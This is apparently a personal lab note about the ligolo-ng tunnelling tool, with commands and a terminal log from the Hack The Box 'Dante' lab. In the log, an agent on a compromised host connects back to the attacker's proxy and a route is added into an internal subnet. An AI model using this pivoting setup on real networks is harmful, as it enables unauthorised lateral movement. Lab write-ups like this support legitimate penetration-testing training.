ligolo-ng

created: "2025-12-28 15:57"
tags:
  - ligolo-ng
  - 隧道代理
aliases:
  - ligolo
Type:
title:
updated: "2026-01-04 13:05"

Quickstart - Ligolo-ng Documentation

./proxy -selfcert
./proxy  -autocert
interface_create --name "evil-cha"

$ ./proxy -h # Help options
$ ./proxy -autocert # Automatically request LetsEncrypt certificates
$ ./proxy -selfcert # Use self-signed certificates

./agent -connect 10.10.14.40:11601 -ignore-cert

ip link delete evil-cha

session
tunnel_start --tun evil-cha
ifconfig
interface_add_route --name evil-cha --route 172.16.1.100/24

┌──(root㉿kali)-[~/Desktop/htb/Dante]
└─# ./proxy -selfcert
INFO[0000] Loading configuration file ligolo-ng.yaml
WARN[0000] Using default selfcert domain 'ligolo', beware of CTI, SOC and IoC!
ERRO[0000] Certificate cache error: acme/autocert: certificate cache miss, returning a new certificate
INFO[0000] Listening on 0.0.0.0:11601
    __    _             __
   / /   (_)___ _____  / /___        ____  ____ _
  / /   / / __ `/ __ \/ / __ \______/ __ \/ __ `/
 / /___/ / /_/ / /_/ / / /_/ /_____/ / / / /_/ /
/_____/_/\__, /\____/_/\____/     /_/ /_/\__, /
        /____/                          /____/

  Made in France ♥            by @Nicocha30!
  Version: 0.8.2

ligolo-ng » interface_create --name "evil-cha"
INFO[0010] Creating a new evil-cha interface...
INFO[0010] Interface created!
ligolo-ng » 2025/12/28 03:00:42 [ERR] yamux: Failed to read header: remote error: tls: bad certificate
ERRO[0245] could not register agent, error: session shutdown
2025/12/28 03:00:42 [ERR] yamux: Failed to write header: remote error: tls: bad certificate
INFO[0268] Agent joined.                                 id=005056b09e97 name=james@DANTE-WEB-NIX01 remote="10.10.110.100:49660"

james@DANTE-WEB-NIX01:~$ ./agent -connect 10.10.14.40:11601 -ignore-cert
WARN[0000] warning, certificate validation disabled
INFO[0000] Connection established                        addr="10.10.14.40:11601"

ligolo-ng » session
? Specify a session : 1 - james@DANTE-WEB-NIX01 - 10.10.110.100:49660 - 005056b09e97
[Agent : james@DANTE-WEB-NIX01] » tunnel_start --tun evil-cha
INFO[0349] Starting tunnel to james@DANTE-WEB-NIX01 (005056b09e97)
[Agent : james@DANTE-WEB-NIX01] » ifconfig
┌────────────────────────────────────┐
│ Interface 0                        │
├──────────────┬─────────────────────┤
│ Name         │ lo                  │
│ Hardware MAC │                     │
│ MTU          │ 65536               │
│ Flags        │ up|loopback|running │
│ IPv4 Address │ 127.0.0.1/8         │
│ IPv6 Address │ ::1/128             │
└──────────────┴─────────────────────┘
┌───────────────────────────────────────────────┐
│ Interface 1                                   │
├──────────────┬────────────────────────────────┤
│ Name         │ eth0                           │
│ Hardware MAC │ 00:50:56:b0:9e:97              │
│ MTU          │ 1500                           │
│ Flags        │ up|broadcast|multicast|running │
│ IPv4 Address │ 172.16.1.100/24                │
│ IPv6 Address │ fe80::250:56ff:feb0:9e97/64    │
└──────────────┴────────────────────────────────┘
[Agent : james@DANTE-WEB-NIX01] » interface_add_route --name evil-cha --route 172.16.1.100/24
INFO[0477] Route created.